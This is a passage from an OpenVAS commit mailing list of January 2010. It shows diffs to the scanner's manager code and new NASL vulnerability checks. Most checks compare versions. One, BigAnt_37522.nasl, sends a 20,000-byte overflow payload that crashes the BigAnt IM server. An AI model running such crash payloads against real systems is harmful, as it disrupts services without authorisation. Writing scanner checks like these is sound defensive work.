http://sunsolve.sun.com/search/document.do?assetkey=1-21-141958-01-1 + + ***** + NOTE: Ignore this warning if patch is applied already. + ***** + + References: + http://secunia.com/advisories/37915/ + http://www.vupen.com/english/advisories/2009/3647 + http://sunsolve.sun.com/search/document.do?assetkey=1-66-270789-1 + + CVSS Score: + CVSS Base Score : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 5.5 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version of Sun Java System DSEE"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 SecPod"); + script_family("Denial of Service"); + script_dependencies("secpod_sun_java_dir_server_detect_win.nasl"); + script_require_keys("Sun/JavaDirServer/Win/Ver"); + script_require_ports("Services/www", 1389, 389); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +foreach dseePort (make_list("1389", "389")) +{ + if(get_port_state(dseePort)) + { + sndReq = http_get(item:string("/"), port:dseePort); + rcvRes = http_send_recv(port:dseePort, data:sndReq); + if("Directory Server" >< rcvRes) + { + ver = get_kb_item("Sun/JavaDirServer/Win/Ver"); + # Check for Sun Java System DSEE version 6.0 to 6.3.1 + if(version_in_range(version:ver, test_version:"6.0", test_version2:"6.3.1")) + { + security_hole(dseePort); + exit(0); + } + } + } +} Property changes on: trunk/openvas-plugins/scripts/secpod_sun_java_dir_server_mult_vuln_win.nasl ___________________________________________________________________ Name: svn:keywords + Revision From scm-commit at wald.intevation.org Mon Jan 4 15:48:44 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 4 Jan 2010 15:48:44 +0100 (CET) Subject: [Openvas-commits] r6303 - in trunk/openvas-manager: . src Message-ID: <20100104144844.31E47861F2C5@pyrosoma.intevation.org> Author: felix Date: 2010-01-04 15:48:42 +0100 (Mon, 04 Jan 2010) New Revision: 6303 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/omp.c Log: In PDF report, enabled page-breaks in service/port per host overview table. Initial commit, size issues still exists (e.g. table header bigger than table). * src/omp.c (print_report_latex): Use longtable environment instead of tabularx environment when printing the service per host overview table. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-04 14:26:56 UTC (rev 6302) +++ trunk/openvas-manager/ChangeLog 2010-01-04 14:48:42 UTC (rev 6303) @@ -1,5 +1,15 @@ 2010-01-04 Felix Wolfsteller + In PDF report, enabled page-breaks in service/port per host overview + table. Initial commit, size issues still exists (e.g. table header + bigger than table). + + * src/omp.c (print_report_latex): Use longtable environment instead of + tabularx environment when printing the service per host overview + table. + +2010-01-04 Felix Wolfsteller + In PDF report, enabled page-breaks in result overview table. * src/omp.c (print_report_latex): Use longtable environment instead of Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2010-01-04 14:26:56 UTC (rev 6302) +++ trunk/openvas-manager/src/omp.c 2010-01-04 14:48:42 UTC (rev 6303) @@ -3370,10 +3370,22 @@ /* Print the result summary table. */ fprintf (out, - "\\begin{tabular}{|l|l|}\n" + "\\begin{longtable}{|l|l|}\n" "\\hline\n" "\\rowcolor{openvas_report}Service (Port)&Threat Level\\\\\n" - "\\hline\n"); + "\\hline\n" + "\\endfirsthead\n" + "\\multicolumn{2}{l}{\\hfill\\ldots continued from previous page \\ldots}\\\\\n" + "\\hline\n" + "\\rowcolor{openvas_report}Service (Port)&Threat Level\\\\\n" + "\\hline\n" + "\\endhead\n" + "\\hline\n" + "\\multicolumn{2}{l}{\\ldots continues on next page \\ldots}\\\\\n" + "\\endfoot\n" + "\\hline\n" + "\\endlastfoot\n" + ); init_result_iterator (&results, report, host, current_int_1, /* First result. */ @@ -3402,7 +3414,7 @@ if (last_port) g_free (last_port); fprintf (out, - "\\end{tabular}\n" + "\\end{longtable}\n" "\n" "%%\\subsection*{Security Issues and Fixes -- %s}\n\n", host_iterator_host (&hosts)); From scm-commit at wald.intevation.org Mon Jan 4 16:17:09 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 4 Jan 2010 16:17:09 +0100 (CET) Subject: [Openvas-commits] r6304 - trunk/winslad Message-ID: <20100104151709.A1BC8861F2E9@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-04 16:17:07 +0100 (Mon, 04 Jan 2010) New Revision: 6304 Modified: trunk/winslad/ChangeLog trunk/winslad/winslad.nsi Log: Including version from VERSION file in file name of installer. * winslad.nsi: Include VERSION in name of outFile. Modified: trunk/winslad/ChangeLog =================================================================== --- trunk/winslad/ChangeLog 2010-01-04 14:48:42 UTC (rev 6303) +++ trunk/winslad/ChangeLog 2010-01-04 15:17:07 UTC (rev 6304) @@ -1,5 +1,11 @@ 2010-01-04 Michael Wiegand + Including version from VERSION file in file name of installer. + + * winslad.nsi: Include VERSION in name of outFile. + +2010-01-04 Michael Wiegand + Providing "make dist" infrastructure. * Makefile: Added "make dist" target. Modified: trunk/winslad/winslad.nsi =================================================================== --- trunk/winslad/winslad.nsi 2010-01-04 14:48:42 UTC (rev 6303) +++ trunk/winslad/winslad.nsi 2010-01-04 15:17:07 UTC (rev 6304) @@ -2,8 +2,11 @@ SetCompressor lzma SetCompress auto +# read version +!define /file version VERSION + # define name of installer -outFile "winslad-installer.exe" +outFile "winslad-installer-${version}.exe" # define installation directory installDir C:\winslad From scm-commit at wald.intevation.org Mon Jan 4 17:55:53 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 4 Jan 2010 17:55:53 +0100 (CET) Subject: [Openvas-commits] r6305 - in trunk/openvas-manager: . src Message-ID: <20100104165553.DEE5D85C7239@pyrosoma.intevation.org> Author: mattm Date: 2010-01-04 17:55:48 +0100 (Mon, 04 Jan 2010) New Revision: 6305 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/manage.h trunk/openvas-manager/src/omp.c trunk/openvas-manager/src/tasks_sql.h Log: Add an option to OMP command GET_CONFIGS for getting the NVT selectors of the configs. * src/tasks_sql.h (NVT_SELECTOR_TYPE_ALL, NVT_SELECTOR_TYPE_FAMILY) (NVT_SELECTOR_TYPE_NVT, NVT_SELECTOR_TYPE_ANY): Move to tasks_sql.h. (init_nvt_selector_iterator): Export. Add config argument. (nvt_selector_iterator_include, nvt_selector_iterator_nvt) (nvt_selector_iterator_name): Export. (nvt_selector_iterator_type): New function. * src/manage.h: Update headers accordingly. * src/omp.c (current_int_4): New variable. (omp_xml_handle_start_element): Store GET_CONFIGS nvt_selectors attribute. (omp_xml_handle_end_element): In CLIENT_GET_CONFIGS respond with NVT selectors according to nvt_selectors attribute. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-04 15:17:07 UTC (rev 6304) +++ trunk/openvas-manager/ChangeLog 2010-01-04 16:55:48 UTC (rev 6305) @@ -1,3 +1,22 @@ +2009-01-04 Matthew Mundell + + Add an option to OMP command GET_CONFIGS for getting the NVT selectors of + the configs. + + * src/tasks_sql.h (NVT_SELECTOR_TYPE_ALL, NVT_SELECTOR_TYPE_FAMILY) + (NVT_SELECTOR_TYPE_NVT, NVT_SELECTOR_TYPE_ANY): Move to tasks_sql.h. + (init_nvt_selector_iterator): Export. Add config argument. + (nvt_selector_iterator_include, nvt_selector_iterator_nvt) + (nvt_selector_iterator_name): Export. + (nvt_selector_iterator_type): New function. + + * src/manage.h: Update headers accordingly. + + * src/omp.c (current_int_4): New variable. + (omp_xml_handle_start_element): Store GET_CONFIGS nvt_selectors attribute. + (omp_xml_handle_end_element): In CLIENT_GET_CONFIGS respond with NVT + selectors according to nvt_selectors attribute. + 2010-01-04 Felix Wolfsteller In PDF report, enabled page-breaks in service/port per host overview @@ -25,6 +44,7 @@ verbatim environment. (print_report_latex): Removed done todo, minor style edit. +>>>>>>> .r6304 2009-12-31 Matthew Mundell Add OMP command TEST_ESCALATOR. Modified: trunk/openvas-manager/src/manage.h =================================================================== --- trunk/openvas-manager/src/manage.h 2010-01-04 15:17:07 UTC (rev 6304) +++ trunk/openvas-manager/src/manage.h 2010-01-04 16:55:48 UTC (rev 6305) @@ -843,8 +843,26 @@ /* NVT selectors. */ -/** @todo Hide NVT selectors behind configs. */ +/** + * @brief NVT selector type for "all" rule. + */ +#define NVT_SELECTOR_TYPE_ALL 0 +/** + * @brief NVT selector type for "family" rule. + */ +#define NVT_SELECTOR_TYPE_FAMILY 1 + +/** + * @brief NVT selector type for "NVT" rule. + */ +#define NVT_SELECTOR_TYPE_NVT 2 + +/** + * @brief Special NVT selector type for selecting all types in interfaces. + */ +#define NVT_SELECTOR_TYPE_ANY 999 + void init_family_iterator (iterator_t*, int, const char*, int); @@ -857,6 +875,21 @@ int nvt_selector_nvt_count (const char *, const char *, int); +void +init_nvt_selector_iterator (iterator_t*, const char*, const char*, int); + +const char* +nvt_selector_iterator_nvt (iterator_t*); + +const char* +nvt_selector_iterator_name (iterator_t*); + +int +nvt_selector_iterator_include (iterator_t*); + +int +nvt_selector_iterator_type (iterator_t*); + /* NVT preferences. */ Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2010-01-04 15:17:07 UTC (rev 6304) +++ trunk/openvas-manager/src/omp.c 2010-01-04 16:55:48 UTC (rev 6305) @@ -443,6 +443,11 @@ int current_int_3; /** + * @brief Generic integer variable for communicating between the callbacks. + */ +int current_int_4; + +/** * @brief Buffer of output to the client. */ char to_client[TO_CLIENT_BUFFER_SIZE]; @@ -1178,6 +1183,11 @@ current_int_3 = atoi (attribute); else current_int_3 = 0; + if (find_attribute (attribute_names, attribute_values, + "nvt_selectors", &attribute)) + current_int_4 = atoi (attribute); + else + current_int_4 = 0; set_client_state (CLIENT_GET_CONFIGS); } else if (strcasecmp ("GET_DEPENDENCIES", element_name) == 0) @@ -7514,6 +7524,40 @@ SEND_TO_CLIENT_OR_FAIL (""); } + if (current_int_4) + { + iterator_t selectors; + + /* The "nvt_selectors" attribute was true. */ + + SEND_TO_CLIENT_OR_FAIL (""); + + init_nvt_selector_iterator (&selectors, + NULL, + config_name, + NVT_SELECTOR_TYPE_ANY); + while (next (&selectors)) + { + int type = nvt_selector_iterator_type (&selectors); + SENDF_TO_CLIENT_OR_FAIL + ("" + "%s" + "%i" + "%i" + "%s" + "", + nvt_selector_iterator_name (&selectors), + nvt_selector_iterator_include (&selectors), + type, + (type == NVT_SELECTOR_TYPE_ALL + ? "" + : nvt_selector_iterator_nvt (&selectors))); + } + cleanup_iterator (&selectors); + + SEND_TO_CLIENT_OR_FAIL (""); + } + SENDF_TO_CLIENT_OR_FAIL (""); } openvas_free_string_var (¤t_name); Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2010-01-04 15:17:07 UTC (rev 6304) +++ trunk/openvas-manager/src/tasks_sql.h 2010-01-04 16:55:48 UTC (rev 6305) @@ -34,26 +34,6 @@ #include "splint.h" #endif -/** - * @brief NVT selector type for "all" rule. - */ -#define NVT_SELECTOR_TYPE_ALL 0 - -/** - * @brief NVT selector type for "family" rule. - */ -#define NVT_SELECTOR_TYPE_FAMILY 1 - -/** - * @brief NVT selector type for "NVT" rule. - */ -#define NVT_SELECTOR_TYPE_NVT 2 - -/** - * @brief Special NVT selector type for selecting all types in interfaces. - */ -#define NVT_SELECTOR_TYPE_ANY 999 - /* Types. */ @@ -73,9 +53,6 @@ preference_iterator_value (iterator_t*); static void -init_nvt_selector_iterator (iterator_t*, const char*, int); - -static void nvt_selector_add (const char*, const char*, const char*, int); static int @@ -84,16 +61,7 @@ static int nvt_selector_family_count (const char*, int); -static const char* -nvt_selector_iterator_nvt (iterator_t*); - -static const char* -nvt_selector_iterator_name (iterator_t*); - static int -nvt_selector_iterator_include (iterator_t*); - -static int nvt_selector_nvts_growing (const char*); static int @@ -463,7 +431,7 @@ sql ("CREATE TABLE IF NOT EXISTS lsc_credentials (id INTEGER PRIMARY KEY, name, login, password, comment, public_key TEXT, private_key TEXT, rpm TEXT, deb TEXT, exe TEXT);"); sql ("CREATE TABLE IF NOT EXISTS meta (id INTEGER PRIMARY KEY, name UNIQUE, value);"); sql ("CREATE TABLE IF NOT EXISTS nvt_preferences (id INTEGER PRIMARY KEY, name, value);"); - /* nvt_selectors types: 0 all, 1 family, 2 NVT (NVT_SELECTOR_TYPE_* above). */ + /* nvt_selectors types: 0 all, 1 family, 2 NVT (NVT_SELECTOR_TYPE_* in manage.h). */ sql ("CREATE TABLE IF NOT EXISTS nvt_selectors (id INTEGER PRIMARY KEY, name, exclude INTEGER, type INTEGER, family_or_nvt, family);"); sql ("CREATE INDEX IF NOT EXISTS nvt_selectors_by_name ON nvt_selectors (name);"); sql ("CREATE INDEX IF NOT EXISTS nvt_selectors_by_family_or_nvt ON nvt_selectors (type, family_or_nvt);"); @@ -980,7 +948,7 @@ sql ("ALTER TABLE nvt_selectors ADD COLUMN family;"); - init_nvt_selector_iterator (&nvts, NULL, 2); + init_nvt_selector_iterator (&nvts, NULL, NULL, 2); while (next (&nvts)) { gchar *quoted_name = sql_quote (nvt_selector_iterator_name (&nvts)); @@ -4130,7 +4098,7 @@ { iterator_t nvts; - init_nvt_selector_iterator (&nvts, selector, 2); + init_nvt_selector_iterator (&nvts, selector, NULL, 2); while (next (&nvts)) g_string_append_printf (buffer, " %s = %s\n", @@ -8000,26 +7968,42 @@ * @brief Initialise an NVT selector iterator. * * @param[in] iterator Iterator. + * @param[in] selector Name of single selector to iterate over, NULL for all. + * @param[in] config Name of config to limit iteration to, NULL for all. + * @param[in] type Type of selector. All if config is given. */ -static void -init_nvt_selector_iterator (iterator_t* iterator, const char* selector, int type) +void +init_nvt_selector_iterator (iterator_t* iterator, const char* selector, + const char* config, int type) { gchar *sql; - assert (type >= 0 && type <= 2); + assert (selector ? config == NULL : (config ? selector == NULL : 1)); + assert (config ? type == NVT_SELECTOR_TYPE_ANY : (type >= 0 && type <= 2)); if (selector) { gchar *quoted_selector = sql_quote (selector); - sql = g_strdup_printf ("SELECT exclude, family_or_nvt, name" + sql = g_strdup_printf ("SELECT exclude, family_or_nvt, name, type" " FROM nvt_selectors" " WHERE name = '%s' AND type = %i;", quoted_selector, type); g_free (quoted_selector); } + else if (config) + { + gchar *quoted_config = sql_quote (config); + sql = g_strdup_printf ("SELECT exclude, family_or_nvt, name, type" + " FROM nvt_selectors" + " WHERE name =" + " (SELECT nvt_selector FROM configs" + " WHERE configs.name = '%s');", + quoted_config); + g_free (quoted_config); + } else - sql = g_strdup_printf ("SELECT exclude, family_or_nvt, name" + sql = g_strdup_printf ("SELECT exclude, family_or_nvt, name, type" " FROM nvt_selectors" " WHERE type = %i;", type); @@ -8034,7 +8018,7 @@ * * @return -1 if iteration is complete, 1 if include, else 0. */ -static int +int nvt_selector_iterator_include (iterator_t* iterator) { int ret; @@ -8050,7 +8034,7 @@ * * @return NVT selector, or NULL if iteration is complete. */ -static DEF_ACCESS (nvt_selector_iterator_nvt, 1); +DEF_ACCESS (nvt_selector_iterator_nvt, 1); /** * @brief Get the name from an NVT selector iterator. @@ -8059,9 +8043,25 @@ * * @return NVT selector, or NULL if iteration is complete. */ -static DEF_ACCESS (nvt_selector_iterator_name, 2); +DEF_ACCESS (nvt_selector_iterator_name, 2); /** + * @brief Get the type from an NVT selector. + * + * @param[in] iterator Iterator. + * + * @return -1 if iteration is complete, 1 if include, else 0. + */ +int +nvt_selector_iterator_type (iterator_t* iterator) +{ + int ret; + if (iterator->done) return -1; + ret = (int) sqlite3_column_int (iterator->stmt, 3); + return ret; +} + +/** * @brief Get the number of families included in a config. * * @param[in] config Config selector is part of. From scm-commit at wald.intevation.org Mon Jan 4 18:09:15 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 4 Jan 2010 18:09:15 +0100 (CET) Subject: [Openvas-commits] r6306 - in trunk/openvas-plugins: . scripts Message-ID: <20100104170915.CD649861F2F0@pyrosoma.intevation.org> Author: mime Date: 2010-01-04 18:09:12 +0100 (Mon, 04 Jan 2010) New Revision: 6306 Added: trunk/openvas-plugins/scripts/BigAnt_37522.nasl trunk/openvas-plugins/scripts/CoreHTTP_37454.nasl trunk/openvas-plugins/scripts/barracuda_web_application_firewall_37432.nasl trunk/openvas-plugins/scripts/barracuda_web_application_firewall_detect.nasl trunk/openvas-plugins/scripts/sendmail_37543.nasl trunk/openvas-plugins/scripts/squid_37522.nasl trunk/openvas-plugins/scripts/unbound_37459.nasl trunk/openvas-plugins/scripts/unbound_version.nasl trunk/openvas-plugins/scripts/viewvc_37518.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2010-01-04 16:55:48 UTC (rev 6305) +++ trunk/openvas-plugins/ChangeLog 2010-01-04 17:09:12 UTC (rev 6306) @@ -1,3 +1,16 @@ +2010-01-04 Michael Meyer + + * scripts/sendmail_37543.nasl, + scripts/barracuda_web_application_firewall_detect.nasl, + scripts/CoreHTTP_37454.nasl, + scripts/squid_37522.nasl, + scripts/unbound_version.nasl, + scripts/unbound_37459.nasl, + scripts/BigAnt_37522.nasl, + scripts/viewvc_37518.nasl, + scripts/barracuda_web_application_firewall_37432.nasl: + Added new plugins. + 2010-01-04 Chandrashekhar B * scripts/secpod_mysql_bof_vuln_lin.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2010-01-04 16:55:48 UTC (rev 6305) +++ trunk/openvas-plugins/cve_current.txt 2010-01-04 17:09:12 UTC (rev 6306) @@ -457,3 +457,10 @@ CVE-2009-4442 SecPod svn L CVE-2009-4443 SecPod svn L CVE-2009-4484 SecPod svn R +37543 Greenbone svn R +37454 Greenbone svn R +37522 Greenbone svn R +CVE-2009-3602 Greenbone svn R +37520 Greenbone svn R +37518 Greenbone svn R +37432 Greenbone svn R Added: trunk/openvas-plugins/scripts/BigAnt_37522.nasl =================================================================== --- trunk/openvas-plugins/scripts/BigAnt_37522.nasl 2010-01-04 16:55:48 UTC (rev 6305) +++ trunk/openvas-plugins/scripts/BigAnt_37522.nasl 2010-01-04 17:09:12 UTC (rev 6306) @@ -0,0 +1,89 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# BigAnt IM Server 'USV' Request Buffer Overflow Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100413); + script_bugtraq_id(37520); + script_version ("1.0-$Revision$"); + + script_name("BigAnt IM Server 'USV' Request Buffer Overflow Vulnerability"); + +desc = "Overview: +BigAnt IM Server is prone to a remote buffer-overflow vulnerability +because it fails to perform adequate boundary checks on user- +supplied input. + +An attacker can exploit this issue to execute arbitrary code with the +privileges of the user running the server. Failed exploit attempts +will result in a denial-of-service condition. + +BigAnt IM Server 2.52 is vulnerable; other versions may also be +affected. + +References: +http://www.securityfocus.com/bid/37520 +http://www.bigantsoft.com + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if BigAnt IM Server is prone to a buffer-overflow vulnerability"); + script_category(ACT_DENIAL); + script_family("Buffer overflow"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("BigAnt_detect.nasl"); + script_require_ports("Services/BigAnt", 6660); + exit(0); +} + +include("http_func.inc"); + +if(safe_checks())exit(0); + +port = get_kb_item("Services/BigAnt"); +if(!port)exit(0); + +if(!get_port_state(port))exit(0); +if(http_is_dead(port:port))exit(0); + +payload = crap(data:raw_string(0x90), length: 20000); + +soc = open_sock_tcp(port); +if(!soc)exit(0); + +req = string("USV ", payload, "\r\n\r\n"); + +send(socket:soc, data:req); +sleep(5); +if(http_is_dead(port: port)) { + security_warning(port:port); + exit(0); +} + +exit(0); + + Property changes on: trunk/openvas-plugins/scripts/BigAnt_37522.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/CoreHTTP_37454.nasl =================================================================== --- trunk/openvas-plugins/scripts/CoreHTTP_37454.nasl 2010-01-04 16:55:48 UTC (rev 6305) +++ trunk/openvas-plugins/scripts/CoreHTTP_37454.nasl 2010-01-04 17:09:12 UTC (rev 6306) @@ -0,0 +1,80 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# CoreHTTP CGI Support Remote Command Execution Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100418); + script_bugtraq_id(37454); + script_version ("1.0-$Revision$"); + + script_name("CoreHTTP CGI Support Remote Command Execution Vulnerability"); + +desc = "Overview: +CoreHTTP is prone to a remote command-execution vulnerability because +the software fails to adequately sanitize user-supplied input. + +Successful attacks can compromise the affected software and possibly +the computer. + +CoreHTTP 0.5.3.1 is vulnerable; other versions may also be affected. + +References: +http://www.securityfocus.com/bid/37454 +http://corehttp.sourceforge.net/ +http://aconole.brad-x.com/advisories/corehttp.txt + +Risk factor : High"; + + script_description(desc); + script_summary("Determine if CoreHTTP version is 0.5.3.1"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 5555); + exit(0); +} + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:5555); +if(!get_port_state(port))exit(0); + +banner = get_http_banner(port: port); +if(!banner)exit(0); + +if(egrep(pattern:"Server: corehttp", string:banner)) { + version = eregmatch(pattern: "Server: corehttp-([0-9.]+)", string: banner); + if(!isnull(version[1])) { + if(version_is_equal(version: version[1], test_version: "0.5.3.1")) { + security_hole(port:port); + exit(0); + } + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/CoreHTTP_37454.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/barracuda_web_application_firewall_37432.nasl =================================================================== --- trunk/openvas-plugins/scripts/barracuda_web_application_firewall_37432.nasl 2010-01-04 16:55:48 UTC (rev 6305) +++ trunk/openvas-plugins/scripts/barracuda_web_application_firewall_37432.nasl 2010-01-04 17:09:12 UTC (rev 6306) @@ -0,0 +1,82 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100420); + script_bugtraq_id(37432); + script_version ("1.0-$Revision$"); + + script_name("Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities"); + +desc = "Overview: +The Barracuda Web Application Firewall 660 is prone to multiple HTML- +injection vulnerabilities. + +Attacker-supplied HTML and script code would execute in the context of +the affected site, potentially allowing the attacker to steal cookie- +based authentication credentials or to control how the site is +rendered to the user; other attacks are also possible. + +The Barracuda Web Application Firewall 660 firmware 7.3.1.007 is +vulnerable; other versions may also be affected. + +References: +http://www.securityfocus.com/bid/37432 +http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Barracuda Web Application Firewall version is 7.3.1.007"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("barracuda_web_application_firewall_detect.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if(!version = get_kb_item(string("www/", port, "/barracuda_web_application_firewall")))exit(0); + +if(!isnull(version) && version >!< "unknown") { + + if(version_is_equal(version: version, test_version: "7.3.1.007")) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/barracuda_web_application_firewall_37432.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/barracuda_web_application_firewall_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/barracuda_web_application_firewall_detect.nasl 2010-01-04 16:55:48 UTC (rev 6305) +++ trunk/openvas-plugins/scripts/barracuda_web_application_firewall_detect.nasl 2010-01-04 17:09:12 UTC (rev 6306) @@ -0,0 +1,97 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Barracuda Web Application Firewall Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running Barracuda Web Application Firewall. The +Barracuda Web Application Firewall is a security solution for Web +applications and Web sites. + +See also: +http://www.barracudanetworks.com + +Risk factor : None"; + +if (description) +{ + script_id(100419); + script_version ("1.0-$Revision$"); + + script_name("Barracuda Web Application Firewall Detection"); + script_description(desc); + script_summary("Checks for the presence of Barracuda Web Application Firewall"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "http_version.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("global_settings.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + + url = string(dir, "/cgi-mod/index.cgi"); + req = http_get(item:url, port:port); + buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE); + if( buf == NULL )continue; + + if(egrep(pattern: "Barracuda Web Application Firewall", string: buf, icase: TRUE)) { + + vers = string("unknown"); + ### try to get version + version = eregmatch(string: buf, pattern: "barracuda.css\?v=([0-9.]+)",icase:TRUE); + + if ( !isnull(version[1]) ) { + vers=chomp(version[1]); + } + + set_kb_item(name: string("www/", port, "/barracuda_web_application_firewall"), value: vers); + + info = string("None\n\nBarracuda Web Application Firewall Version '"); + info += string(vers); + info += string("' was detected on the remote host.\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + if(report_verbosity > 0) { + security_note(port:port,data:desc); + } + exit(0); + + } + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/barracuda_web_application_firewall_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/sendmail_37543.nasl =================================================================== --- trunk/openvas-plugins/scripts/sendmail_37543.nasl 2010-01-04 16:55:48 UTC (rev 6305) +++ trunk/openvas-plugins/scripts/sendmail_37543.nasl 2010-01-04 17:09:12 UTC (rev 6306) @@ -0,0 +1,86 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Sendmail NULL Character CA SSL Certificate Validation Security Bypass Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100415); + script_bugtraq_id(37543); + script_version ("1.0-$Revision$"); + + script_name("Sendmail NULL Character CA SSL Certificate Validation Security Bypass Vulnerability"); + +desc = "Overview: +Sendmail is 